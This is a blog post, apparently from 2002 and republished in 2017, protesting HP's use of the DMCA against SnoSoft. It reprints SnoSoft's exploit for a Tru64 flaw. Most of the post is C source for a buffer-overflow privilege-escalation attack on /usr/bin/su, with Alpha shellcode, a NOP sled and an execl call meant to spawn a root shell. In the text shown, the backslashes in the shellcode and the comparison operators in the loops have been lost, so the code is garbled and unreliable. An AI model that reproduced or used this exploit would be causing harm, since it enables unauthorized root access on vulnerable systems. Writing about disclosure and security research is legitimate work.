AaronCameron.net
Like the world needed twitter. Jesus.
Not a Member? - Login or Create an Account...MC Offline
Saturday the 23rd of September 2017 @ 07:02am
Front Page Projects Your Profile About
[]

Keyword Search

|< << Previous Next >> >| 1 to 1 of 1

Filed Under: Miscellaneous

Hewlett Packard, who recently urged Bruce Perens to back down in his demonstration against the DMCA, is now using the very same law as a club to beat security experts SnoSoft for posting a security flaw in HP's Tru64.

The exploit itself, just to be precise, is attached to this post.

I will of course take it down if anyone requests :)

0001 #include stdio.h
0002 #include stdlib.h
0003 #include string.h
0004 #include unistd.h
0005 
0006 char shellcode[]= "x30x15xd9x43" "x11x74xf0x47"
0007 "x12x14x02x42" "xfcxffx32xb2"
0008 "x12x94x09x42" "xfcxffx32xb2"
0009 "xffx47x3fx26" "x1fx04x31x22"
0010 "xfcxffx30xb2" "xf7xffx1fxd2"
0011 "x10x04xffx47" "x11x14xe3x43"
0012 "x20x35x20x42" "xffxffxffxff"
0013 "x30x15xd9x43" "x31x15xd8x43"
0014 "x12x04xffx47" "x40xffx1exb6"
0015 "x48xffxfexb7" "x98xffx7fx26"
0016 "xd0x8cx73x22" "x13x05xf3x47"
0017 "x3cxffx7exb2" "x69x6ex7fx26"
0018 "x2fx62x73x22" "x38xffx7exb2"
0019 "x13x94xe7x43" "x20x35x60x42"
0020 "xffxffxffxff";
0021 
0022 main(int argc, char *argv[]) {
0023 	int i, j; char buffer[8239]; char payload[15200];
0024 	char nop[] = "x1fx04xffx47"; bzero(&buffer, 8239);
0025 	bzero(&payload, 15200);
0026 
0027 	for (i=0;i8233;i++) buffer[i] = 0x41;
0028 
0029 	buffer[i++] = 0x01; buffer[i++] = 0x04;
0030 	buffer[i++] = 0x01; buffer[i++] = 0x40;
0031 	buffer[i++] = 0x01;
0032 
0033 	for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
0034 	for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
0035 	printf("/bin/su by phasedn");
0036 	printf("payload %dbn", strlen(payload));
0037 	printf("buffer %dbn", strlen(buffer));
0038 	execl("/usr/bin/su", "su", buffer, payload, 0);
0039 } 

Share:

Keywords:

|< << Previous Next >> >| 1 to 1 of 1
©2017 Aaron Cameron